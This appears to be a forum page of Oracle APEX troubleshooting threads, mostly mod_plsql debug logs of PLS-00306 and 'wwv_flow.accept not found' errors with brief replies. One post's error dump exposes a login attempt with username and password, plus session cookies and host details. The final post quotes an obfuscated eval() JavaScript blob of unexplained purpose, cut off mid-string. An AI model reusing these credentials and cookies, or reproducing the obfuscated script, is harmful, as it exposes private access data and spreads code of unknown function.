    <3240798674 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <3240798674 ms>(wppr.c,520) Pl/sql block parsed...
    <3240798674 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <3240798674 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <3240798674 ms> GATEWAY_IVERSION(17)=(2)3
    <3240798674 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <3240798674 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <3240798674 ms> SERVER_PORT(12)=(5)7777
    <3240798674 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <3240798674 ms> REQUEST_METHOD(15)=(5)POST
    <3240798674 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <3240798674 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <3240798674 ms> REMOTE_ADDR(12)=(9)10.0.2.0
    <3240798674 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <3240798674 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <3240798674 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <3240798674 ms> HTTP_CONTENT_LENGTH(20)=(4)147
    <3240798674 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <3240798674 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <3240798674 ms> HTTP_HOST(10)=(12)mohawk:7777
    <3240798674 ms> HTTP_ACCEPT(12)=(4)*/*
    <3240798674 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <3240798674 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <3240798674 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
    <3240798674 ms> HTTP_ORACLE_ECID(17)=(36)1202314446:10.30.96.8:528620:0:35,0
    <3240798674 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <3240798674 ms> DAD_NAME(9)=(5)apex
    <3240798674 ms> DOC_ACCESS_PATH(16)=(5)docs
    <3240798674 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <3240798674 ms> PATH_ALIAS(11)=(1)
    <3240798674 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <3240798674 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <3240798674 ms> SCRIPT_PREFIX(14)=(5)/pls
    <3240798674 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240798674 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240798675 ms>StrArrPosBind pos 8 Charset Id : 873
    <3240798675 ms>StrArrPosBind pos 9 Charset Id : 873
    <3240798675 ms>StrArrPosBind pos 11 Charset Id : 873
    <3240798679 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240798680 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240798680 ms>(wpu.c,595) longjumping back to the beginning
    <3240798680 ms>(wpu.c,458) cleaning up before longjmp
    <3240798680 ms>(wpu.c,462) doing a rollback
    <3240798680 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
    <3240798680 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
    <3240798680 ms>(wpd.c,1820) Going to close cursor
    <3240798680 ms>DeinitCursor
    <3240798680 ms>(wpx.c,693) Shutdown has been called
    <3240798680 ms>(wpx.c,705) Going to logoff
    <3240798680 ms>Logoff: Pooling this connection
    <3240798680 ms>[ReqEndtime: 6/Feb/2008:16:14:06]
    <3240798680 ms>[ReqExecTime: 13 ms]
    <3240796167 ms>[ReqStartTime: 6/Feb/2008:16:23:03]
    <3240796167 ms>Request ID ReqID:528620_1202314983
    <3240796167 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
    <3240796167 ms>OpenCursor
    <3240796167 ms>(wpd.c,1765) Logged in as (unknown)
    <3240796168 ms>(wpx.c,598) Going to select...
    <3240796168 ms>(wpx.c,652) Have been asked to execute a request
    <3240796168 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
    <3240796168 ms>(wppa.c,1016) Enter ParseUrlData
    <3240796168 ms>POST
    <3240796168 ms>(wpu.c,257) Attempting to read 162 bytes
    <3240796168 ms>(wpu.c,262) We read 162, had 0, to get 0 bytes
    <3240796168 ms>[headers begin]
    <3240796168 ms>[headers end]
    <3240796168 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=1776222419881214&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=Balance%20query
    <3240796168 ms>[form_data]
    <3240796168 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=1776222419881214&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=Balance%20query
    <3240796168 ms>(wppa.c,1523) indx = 6, entryCnt = 6
    <3240796168 ms>(wppa.c,1844) Listing distinct actual names:
    <3240796168 ms>(wppa.c,1846) p_request
    <3240796168 ms>(wppa.c,1846) p_instance
    <3240796168 ms>(wppa.c,1846) p_flow_id
    <3240796168 ms>(wppa.c,1846) p_flow_step_id
    <3240796168 ms>(wppa.c,1846) p_arg_names
    <3240796168 ms>(wppa.c,1846) p_arg_values
    <3240796168 ms>(wppa.c,1848) Listing actuals of array with large entries:
    <3240796168 ms>(wppa.c,1853) Listing distinct actual names and values:
    <3240796168 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
    <3240796168 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 1776222419881214
    <3240796168 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
    <3240796168 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
    <3240796168 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
    <3240796168 ms>(wppa.c,1885) p_arg_values, type = 0, value (14) = Balance query
    <3240796168 ms>(wppa.c,429) Arglist built, 6 unique entries
    <3240796168 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
    <3240796168 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
    <3240796168 ms>(wpd.c,2768) Language for this request is en-gb
    <3240796168 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
    <3240796168 ms>cache: Checking for user level hit
    <3240796168 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/022/4760
    <3240796168 ms>cache: Checking for system level hit
    <3240796168 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/341/1694
    <3240796168 ms>(wppr.c,460) start working with wwv_flow.show
    <3240796168 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
    declare
    rc__ number;
    start_time__ binary_integer;
    simple_list__ owa_util.vc_arr;
    complex_list__ owa_util.vc_arr;
    begin
    start_time__ := dbms_utility.get_time;
    owa.init_cgi_env(:n__,:nm__,:v__);
    htp.HTBUF_LEN := 63;
    null;
    null;
    simple_list__(1) := 'sys.%';
    simple_list__(2) := 'dbms\_%';
    simple_list__(3) := 'utl\_%';
    simple_list__(4) := 'owa\_%';
    simple_list__(5) := 'owa.%';
    simple_list__(6) := 'htp.%';
    simple_list__(7) := 'htf.%';
    simple_list__(8) := 'wpg_docload.%';
    if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
    rc__ := 2;
    else
    null;
    null;
    wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
    if (wpg_docload.is_file_download) then
    rc__ := 1;
    wpg_docload.get_download_file(:doc_info);
    null;
    null;
    null;
    commit;
    else
    rc__ := 0;
    null;
    null;
    null;
    commit;
    owa.get_page(:data__,:ndata__);
    end if;
    end if;
    :rc__ := rc__;
    :db_proc_time__ := dbms_utility.get_time - start_time__;
    end;
    <3240796168 ms>(wppr.c,520) Pl/sql block parsed...
    <3240796168 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <3240796168 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <3240796168 ms> GATEWAY_IVERSION(17)=(2)3
    <3240796168 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <3240796168 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <3240796168 ms> SERVER_PORT(12)=(5)7777
    <3240796168 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <3240796168 ms> REQUEST_METHOD(15)=(5)POST
    <3240796168 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <3240796168 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <3240796168 ms> REMOTE_ADDR(12)=(12)10.0.10.222
    <3240796168 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <3240796168 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <3240796168 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <3240796168 ms> HTTP_CONTENT_LENGTH(20)=(4)162
    <3240796168 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <3240796168 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <3240796168 ms> HTTP_HOST(10)=(12)mohawk:7777
    <3240796168 ms> HTTP_ACCEPT(12)=(4)*/*
    <3240796168 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <3240796168 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <3240796168 ms> HTTP_REFERER(13)=(61)http://mohawk:7777/pls/apex/f?p=1122:1:1776222419881214:::::
    <3240796168 ms> HTTP_ORACLE_ECID(17)=(36)1202314983:10.30.96.8:528620:0:63,0
    <3240796168 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <3240796168 ms> DAD_NAME(9)=(5)apex
    <3240796168 ms> DOC_ACCESS_PATH(16)=(5)docs
    <3240796168 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <3240796168 ms> PATH_ALIAS(11)=(1)
    <3240796168 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <3240796168 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <3240796168 ms> SCRIPT_PREFIX(14)=(5)/pls
    <3240796168 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240796168 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240796168 ms>StrArrPosBind pos 11 Charset Id : 873
    <3240796174 ms>Execute: ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240796174 ms>(wppr.c,640) Execute:declare
    objnum NUMBER;
    objtyp NUMBER;
    prename VARCHAR2(31);
    name VARCHAR(31);
    subname VARCHAR(31);
    dblnk VARCHAR(31);
    begin
    dbms_utility.name_resolve(:objname, 1, prename, name, subname,
    dblnk, objtyp, objnum);
    if (name is null) then
    sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
    else
    sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
    end if;
    exception
    when others then :5 := 1;
    end;
    <3240796174 ms>(wppr.c,660) 6 parameter names
    <3240796174 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240796174 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240796174 ms>StrArrPosBind pos 4 Charset Id : 873
    <3240796176 ms>(wppr.c,704) misdefl=0, nenamei=0
    <3240796176 ms>(wppr.c,744) print list of name, types, typeflags
    <3240796176 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
    <3240796176 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
    <3240796176 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
    <3240796176 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
    <3240796176 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
    <3240796176 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <3240796176 ms>(wppr.c,759) Array graduation (1=>4, 14=>32)
    <3240796176 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <3240796176 ms>(wppr.c,520) Pl/sql block parsed...
    <3240796176 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <3240796176 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <3240796176 ms> GATEWAY_IVERSION(17)=(2)3
    <3240796176 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <3240796176 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <3240796176 ms> SERVER_PORT(12)=(5)7777
    <3240796176 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <3240796176 ms> REQUEST_METHOD(15)=(5)POST
    <3240796176 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <3240796176 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <3240796176 ms> REMOTE_ADDR(12)=(12)10.0.10.222
    <3240796176 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <3240796176 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <3240796176 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <3240796176 ms> HTTP_CONTENT_LENGTH(20)=(4)162
    <3240796176 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <3240796176 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <3240796176 ms> HTTP_HOST(10)=(12)mohawk:7777
    <3240796176 ms> HTTP_ACCEPT(12)=(4)*/*
    <3240796176 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <3240796176 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <3240796176 ms> HTTP_REFERER(13)=(61)http://mohawk:7777/pls/apex/f?p=1122:1:1776222419881214:::::
    <3240796176 ms> HTTP_ORACLE_ECID(17)=(36)1202314983:10.30.96.8:528620:0:63,0
    <3240796176 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <3240796176 ms> DAD_NAME(9)=(5)apex
    <3240796176 ms> DOC_ACCESS_PATH(16)=(5)docs
    <3240796176 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <3240796176 ms> PATH_ALIAS(11)=(1)
    <3240796176 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <3240796176 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <3240796176 ms> SCRIPT_PREFIX(14)=(5)/pls
    <3240796176 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240796176 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240796176 ms>StrArrPosBind pos 8 Charset Id : 873
    <3240796176 ms>StrArrPosBind pos 9 Charset Id : 873
    <3240796176 ms>StrArrPosBind pos 11 Charset Id : 873
    <3240796181 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240796181 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240796181 ms>(wpu.c,595) longjumping back to the beginning
    <3240796181 ms>(wpu.c,458) cleaning up before longjmp
    <3240796181 ms>(wpu.c,462) doing a rollback
    <3240796181 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
    <3240796182 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
    <3240796182 ms>(wpd.c,1820) Going to close cursor
    <3240796182 ms>DeinitCursor
    <3240796182 ms>(wpx.c,693) Shutdown has been called
    <3240796182 ms>(wpx.c,705) Going to logoff
    <3240796182 ms>Logoff: Pooling this connection
    <3240796182 ms>[ReqEndtime: 6/Feb/2008:16:23:03]
    <3240796182 ms>[ReqExecTime: 15 ms]

    Loanshark, this forum is for Oracle Portal caching questions, try posting your question in the APEX forum.
    Cheers,
    Mick.

  • The requested URL /pls/apex/wwv_flow.accept was not found

    So I went in today to add a new form to an application and here is what I get....
    Any new ITEM I make, I can not make any changes to without getting the error. Blank page, blank region, standard form item, nothing else on page, everything set to default.
    Any new pages / regions all work fine.
    Any old pages / regions all work fine.
    If I even just create an item, go back into it and hit apply, I get the "The requested URL /pls/apex/wwv_flow.accept was not found"
    Anyone?

    apex version? listener version?
    web server? version?
    DB version?  are you on RAC?
    (why do people leave these important pieces of information out???)
    personally, if a web site works one minute then fails the next with said error, you have a DNS problem.
    either too many entries in the DNS ... or two computers with the same IP address.
    when the error page displays, double check that the URL is for the correct host and port (eg not localhost)
    MK

  • Requested URL /pls/apex/wwv_flow.accept was not found on this server

    Hi there
    Since yesterday we have had troubles with apex production our environment is Apex 4.1, Oracle 11gR2 over windows server 2008, please help me to solve this issue,
    it happend in the login page and when submit the authentication
    we don have any procedure or form named CSRT (sincerly i don't know what is it)
    Sat, 02 Jun 2012 00:46:58 GMT
    wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: CSRT
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
    DAD name: apex
    PROCEDURE : wwv_flow.accept
    URL : http://<servername>/pls/apex/wwv_flow.accept
    PARAMETERS :
    ===========
    P_FLOW_ID:
    10000
    P_FLOW_STEP_ID:
    101
    P_INSTANCE:
    1188591586206701
    P_PAGE_SUBMISSION_ID:
    1718810680562501
    P_REQUEST:
    P101_PASSWORD
    CSRT:
    4970566970745194725
    P_ARG_NAMES:
    3865609856762007
    3865732602762007
    P_T01:
    administrator
    P_T02:
    passsss
    P_MD5_CHECKSUM:
    P_PAGE_CHECKSUM:
    A98EB992B8BC89BE54BB1A8BAC4F05FF
    ENVIRONMENT:
    ============
    PLSQL_GATEWAY=WebDb
    GATEWAY_IVERSION=3
    SERVER_SOFTWARE=Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
    GATEWAY_INTERFACE=CGI/1.1
    SERVER_PORT=80
    SERVER_NAME=servername
    REQUEST_METHOD=POST
    QUERY_STRING=
    PATH_INFO=/wwv_flow.accept
    SCRIPT_NAME=/pls/apex
    REMOTE_HOST=
    REMOTE_ADDR=148.204.103.109
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_PROTOCOL=HTTP
    REMOTE_USER=APEX_PUBLIC_USER
    ORACLE_SSO_USER=
    OSSO_IDLE_TIMEOUT_EXCEEDED=
    OSSO_USER_GUID=
    HTTP_CONTENT_LENGTH=312
    HTTP_CONTENT_TYPE=application/x-www-form-urlencoded
    HTTP_USER_AGENT=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    HTTP_HOST=www.ebecas.ipn.mx
    HTTP_ACCEPT=text/html, application/xhtml+xml, */*
    HTTP_ACCEPT_ENCODING=
    HTTP_ACCEPT_LANGUAGE=es-MX
    HTTP_ACCEPT_CHARSET=
    HTTP_COOKIE=WWV_CUSTOM-F_1280503233500189_10000=3CAE234CC12CBF34CAC4A802F7E56419; WWV_CUSTOM-F_3230615565651498_2000=85A8907E234374F9065F2AD170F7B446; PUBLIC_WWV_CUSTOM-F_3230615565651498_2000=2708019786394201; WWV_CUSTOM-F_3230615565651498_2400=038325581CE3C913839B01B86444E24E; PUBLIC_WWV_CUSTOM-F_3230615565651498_2400=609137910649001; WWV_CUSTOM-F_3230615565651498_308=0437267FCCB0A166B36DCF5BA56261EB; PUBLIC_WWV_CUSTOM-F_3230615565651498_308=30428853764001; WWV_CUSTOM-F_1280503233500189_777=5B01254A5CD4D740F4758DC9EC163928; PUBLIC_WWV_CUSTOM-F_1280503233500189_777=689694810635801; PUBLIC_WWV_CUSTOM-F_1280503233500189_10000=1649958529159401; WWV_CUSTOM-F_1280503233500189_100=5932332699F7E216AE8D86FD62D69B5A; ORA_WWV_USER_63131075338127=AB757F79A601B064B269432C60D984AC; TS5d40a3=ccd424a738458568ec242aa1123ddd1e596ad0e9e522c57a4fc7aaf6; ORA_WWV_USER_71418318778246=0A42816D6E86C44D1731B394A8802013; __utmc=8977645; TS5af0a4=8ea79f2c523309c506a0a48047fd743f596ad0e9e522c57a4fc962d0; TS5af0a4_28=2a1d0a2d897dca30ab56d0cb72789138596ad0e9e522c57a0000000000000000004fc7c5b78414789acdf34f97; TS5af0a4_77=8572_0e073dd415ef2d41_rsb_0_rs_http%3A%2F%2Fwww.ebecas.ipn.mx%2Fportal%2Ff%3Fp%3D10000%3ABIENVENIDO_rs_1
    HTTP_IF_MODIFIED_SINCE=
    HTTP_REFERER=http://<servername>/pls/apex/f?p=10000:101:1188591586206701
    HTTP_SOAPACTION=
    HTTP_ORACLE_ECID=6305641793926,1
    HTTP_ORACLE_CACHE_VERSION=10.1.2
    HTTP_AUTHORIZATION=
    WEB_AUTHENT_PREFIX=
    DAD_NAME=apex
    DOC_ACCESS_PATH=docs
    DOCUMENT_TABLE=wwv_flow_file_objects$
    PATH_ALIAS=
    REQUEST_CHARSET=AL32UTF8
    REQUEST_IANA_CHARSET=UTF-8
    SCRIPT_PREFIX=/pls
    HTTP_IF_MATCH=
    HTTP_CACHE_CONTROL=
    SOAP_BODY=
    HTTP_X_ORACLE_DEVICE_CLASS=
    HTTP_X_ORACLE_DEVICE_ORIENTATION=
    HTTP_X_ORACLE_DEVICE_MAXDOCSIZE=
    HTTP_X_ORACLE_DEVICE=
    HTTP_X_ORACLE_ORIG_ACCEPT=
    HTTP_X_ORACLE_ORIG_USER_AGENT=
    HTTP_X_ORACLE_USER_LOCALE=
    HTTP_X_ORACLE_USER_NAME=
    HTTP_X_ORACLE_USER_DISPLAYNAME=
    HTTP_X_ORACLE_USER_USERKIND=
    HTTP_X_ORACLE_USER_AUTHKIND=
    HTTP_X_ORACLE_USER_DEVICEID=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE1=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE2=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLASTLINE=
    HTTP_X_ORACLE_USER_LOCATION_BLOCK=
    HTTP_X_ORACLE_USER_LOCATION_CITY=
    HTTP_X_ORACLE_USER_LOCATION_COMPANYNAME=
    HTTP_X_ORACLE_USER_LOCATION_COUNTY=
    HTTP_X_ORACLE_USER_LOCATION_STATE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODEEXT=
    HTTP_X_ORACLE_USER_LOCATION_COUNTRY=
    HTTP_X_ORACLE_USER_LOCATION_TYPE=
    HTTP_X_ORACLE_USER_LOCATION_X=
    HTTP_X_ORACLE_USER_LOCATION_Y=
    HTTP_X_ORACLE_SERVICE_HOME_URL=
    HTTP_X_ORACLE_SERVICE_PARENT_URL=
    HTTP_X_ORACLE_HOME_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_LABEL=
    HTTP_X_ORACLE_CACHE_USER=
    HTTP_X_ORACLE_CACHE_SUBID=
    HTTP_X_ORACLE_CACHE_AUTH=
    HTTP_X_ORACLE_CACHE_DEVICE=
    HTTP_X_ORACLE_CACHE_LANG=
    HTTP_X_ORACLE_CACHE_ENCRYPT=
    HTTP_X_ORACLE_ASSERT_USER=

    Tx for help me folks!
    Let me explain
    We have tw domains (a and b) that access to a same database (where the app is)
    i configured the dads.conf to access the database in both domains, from domain a
    i can't acces the app, it send the error before wrote, and from domain b i can access
    without trouble my app, a search the HTML source from my page in both domains and
    notice that in domain a the source is the next (just a bit)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928a